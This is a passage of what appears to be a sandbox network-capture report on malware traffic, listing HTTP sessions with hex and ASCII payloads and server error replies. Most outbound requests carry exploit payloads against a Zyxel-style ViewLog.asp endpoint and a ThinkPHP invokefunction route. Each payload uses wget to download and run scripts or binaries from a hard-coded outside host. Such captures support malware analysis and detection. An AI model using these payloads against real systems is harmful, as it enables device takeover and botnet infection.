                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:18:32.785227060 CET4109OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:19:05.804898977 CET8185OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              90192.168.2.235798085.122.224.2218080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:18:24.099919081 CET3053OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              900192.168.2.236096288.119.146.480
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:20:21.156372070 CET17487OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:20:21.481792927 CET17544INHTTP/1.1 400 Bad Request
                                                              Date: Mon, 13 Nov 2023 21:20:21 GMT
                                                              Server: xxxxxxxx-xxxxx
                                                              Connection: close
                                                              Content-Type: text/html; charset=iso-8859-1
                                                              X-Frame-Options: SAMEORIGIN
                                                              Content-Security-Policy: frame-ancestors 'self'
                                                              X-UA-Compatible: IE=Edge
                                                              X-Pad: avoid browser bug
                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 48 31 3e 0a 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 50 3e 0a 54 68 65 20 72 65 71 75 65 73 74 20 6c 69 6e 65 20 63 6f 6e 74 61 69 6e 65 64 20 69 6e 76 61 6c 69 64 20 63 68 61 72 61 63 74 65 72 73 20 66 6f 6c 6c 6f 77 69 6e 67 20 74 68 65 20 70 72 6f 74 6f 63 6f 6c 20 73 74 72 69 6e 67 2e 3c 50 3e 0a 3c 50 3e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><HTML><HEAD><TITLE>400 Bad Request</TITLE></HEAD><BODY><H1>Bad Request</H1>Your browser sent a request that this server could not understand.<P>The request line contained invalid characters following the protocol string.<P><P></BODY></HTML>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              901192.168.2.235181288.221.28.15580
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:20:21.168343067 CET17535OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:20:21.504183054 CET17547INHTTP/1.0 400 Bad Request
                                                              Server: AkamaiGHost
                                                              Mime-Version: 1.0
                                                              Content-Type: text/html
                                                              Content-Length: 257
                                                              Expires: Mon, 13 Nov 2023 21:20:21 GMT
                                                              Date: Mon, 13 Nov 2023 21:20:21 GMT
                                                              Connection: close
                                                              Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 62 35 35 30 38 63 34 66 26 23 34 36 3b 31 36 39 39 39 31 30 34 32 31 26 23 34 36 3b 63 30 66 37 65 39 66 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                              Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http&#58;&#47;&#47;&#37;5bNo&#37;20Host&#37;5d&#47;index&#46;php&#63;", is invalid.<p>Reference&#32;&#35;9&#46;b5508c4f&#46;1699910421&#46;c0f7e9f</BODY></HTML>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              902192.168.2.235912688.216.96.11180
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:20:21.340542078 CET17537OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:20:21.554547071 CET17551INHTTP/1.1 400 Bad request
                                                              Content-length: 90
                                                              Cache-Control: no-cache
                                                              Connection: close
                                                              Content-Type: text/html
                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 72 65 71 75 65 73 74 3c 2f 68 31 3e 0a 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 6e 20 69 6e 76 61 6c 69 64 20 72 65 71 75 65 73 74 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                              Data Ascii: <html><body><h1>400 Bad request</h1>Your browser sent an invalid request.</body></html>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              903192.168.2.233576288.221.123.10180
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:20:21.443672895 CET17539OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:20:21.751343012 CET17579INHTTP/1.0 400 Bad Request
                                                              Server: AkamaiGHost
                                                              Mime-Version: 1.0
                                                              Content-Type: text/html
                                                              Content-Length: 258
                                                              Expires: Mon, 13 Nov 2023 21:20:21 GMT
                                                              Date: Mon, 13 Nov 2023 21:20:21 GMT
                                                              Connection: close
                                                              Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 36 35 37 62 64 64 35 38 26 23 34 36 3b 31 36 39 39 39 31 30 34 32 31 26 23 34 36 3b 31 34 35 36 32 35 33 34 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                              Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http&#58;&#47;&#47;&#37;5bNo&#37;20Host&#37;5d&#47;index&#46;php&#63;", is invalid.<p>Reference&#32;&#35;9&#46;657bdd58&#46;1699910421&#46;14562534</BODY></HTML>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              904192.168.2.235227488.109.130.8280
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:20:21.445487022 CET17541OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:20:21.757724047 CET17605INHTTP/1.1 404 Not Found
                                                              Content-Length: 0
                                                              Date: Mon, 13 Nov 2023 21:20:36 GMT


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              905192.168.2.233789288.99.126.4880
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:20:21.446547031 CET17541OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:20:21.754640102 CET17593INHTTP/1.1 400 Bad Request
                                                              Content-Type: text/plain; charset=utf-8
                                                              Connection: close
                                                              Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
                                                              Data Ascii: 400 Bad Request


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              906192.168.2.236039285.92.183.1078080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:20:21.458420038 CET17542OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              907192.168.2.234795631.40.224.1618080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:20:21.513369083 CET17549OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:20:21.857881069 CET17653INHTTP/1.0 400 Bad Request
                                                              Server: squid/3.1.23
                                                              Mime-Version: 1.0
                                                              Date: Mon, 13 Nov 2023 20:51:21 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 3169
                                                              X-Squid-Error: ERR_INVALID_URL 0
                                                              Connection: close
                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 20 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 20 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 20 20 20 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 7d 0a 0a 68 74 6d 6c 20 62 6f 64 79 20 7b 0a 09 6d 61 72 67 69 6e 3a 20 30 3b 0a 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 65 66 65 66 65 66 3b 0a 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0a 09 63 6f 6c 6f 72 3a 20 23 31 65 31 65 31 65 3b 0a 7d 0a 0a 2f 2a 20 50 61 67 65 20 64 69 73 70 6c 61 79 65 64 20 74 69 74 6c 65 20 61 72 65 61 20 2a 2f 0a 23 74 69 74 6c 65 73 20 7b 0a 09 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 31 35 70 78 3b 0a 09 70 61 64 64 69 6e 67 3a 20 31 30 70 78 3b 0a 09 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 20 31 30 30 70 78 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 75 72 6c 28 27 68 74 74 70 3a 2f 2f 77 77 77 2e 73 71 75 69 64 2d 63 61 63 68 65 2e 6f 72 67 2f 41 72 74 77 6f 72 6b 2f 53 4e 2e 70 6e 67 27 29 20 6e 6f 2d 72 65 70 65 61 74 20 6c 65 66 74 3b 0a 7d 0a 0a 2f 2a 20 69 6e 69 74 69 61 6c 20 74 69 74 6c 65 20 2a 2f 0a 23 74 69 74 6c 65 73 20 68 31 20 7b 0a 09 63 6f 6c 6f 72 3a 20 23 30 30 30 30 30 30 3b 0a 7d 0a 23 74 69 74 6c 65 73 20 68 32 20 7b 0a 09 63 6f 6c 6f 72 3a 20 23 30 30 30 30 30 30 3b 0a 7d 0a 0a 2f 2a 20 73 70 65 63 69 61 6c 20 65 76 65 6e 74 3a 20 46 54 50 20 73 75 63 63 65 73 73 20 70 61 67 65 20 74 69 74 6c 65 73 20 2a 2f 0a 23 74 69 74 6c 65 73 20 66 74 70 73 75 63 63 65 73 73 20 7b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 66 66 30 30 3b 0a 09 77 69 64 74 68 3a 31 30 30 25 3b 0a 7d 0a 0a 2f 2a 20 50 61 67 65 20 64 69 73 70 6c 61 79 65 64 20 62 6f 64 79 20 63 6f 6e 74 65 6e 74 20 61 72 65 61 20 2a 2f 0a 23 63 6f 6e 74 65 6e 74 20 7b 0a 09 70 61 64 64 69 6e 67 3a 20 31 30 70 78 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 66 66 66
                                                              Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html><head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <title>ERROR: The requested URL could not be retrieved</title> <style type="text/css">... /* Stylesheet for Squid Error pages Adapted from design by Free CSS Templates http://www.freecsstemplates.org Released for free under a Creative Commons Attribution 2.5 License*//* Page basics */* {font-family: verdana, sans-serif;}html body {margin: 0;padding: 0;background: #efefef;font-size: 12px;color: #1e1e1e;}/* Page displayed title area */#titles {margin-left: 15px;padding: 10px;padding-left: 100px;background: url('http://www.squid-cache.org/Artwork/SN.png') no-repeat left;}/* initial title */#titles h1 {color: #000000;}#titles h2 {color: #000000;}/* special event: FTP success page titles */#titles ftpsuccess {background-color:#00ff00;width:100%;}/* Page displayed body content area */#content {padding: 10px;background: #ffffff


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              908192.168.2.233843494.122.122.2338080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:20:21.516298056 CET17550OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              90988.216.96.11180192.168.2.2359148
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:20:21.768584967 CET17650INHTTP/1.1 400 Bad request
                                                              Content-length: 90
                                                              Cache-Control: no-cache
                                                              Connection: close
                                                              Content-Type: text/html
                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 72 65 71 75 65 73 74 3c 2f 68 31 3e 0a 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 6e 20 69 6e 76 61 6c 69 64 20 72 65 71 75 65 73 74 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                              Data Ascii: <html><body><h1>400 Bad request</h1>Your browser sent an invalid request.</body></html>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              91192.168.2.234146231.172.75.1178080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:18:24.108511925 CET3054OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:18:24.416086912 CET3070INHTTP/1.1 400 Bad Request
                                                              Date: Mon, 13 Nov 2023 21:18:24 GMT
                                                              Server: Apache/2.4.54 (Ubuntu) mod_fcgid/2.3.9 OpenSSL/1.1.1f
                                                              Content-Length: 226
                                                              Connection: close
                                                              Content-Type: text/html; charset=iso-8859-1
                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p></body></html>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              910192.168.2.234940694.122.209.528080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:20:21.851851940 CET17651OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              911192.168.2.235433894.120.250.1108080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:20:21.860141993 CET17656OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              912192.168.2.235460862.29.75.1598080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:20:22.540220976 CET17680OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              913192.168.2.233934694.120.58.1658080
                                                              TimestampkBytes transferredDirectionData
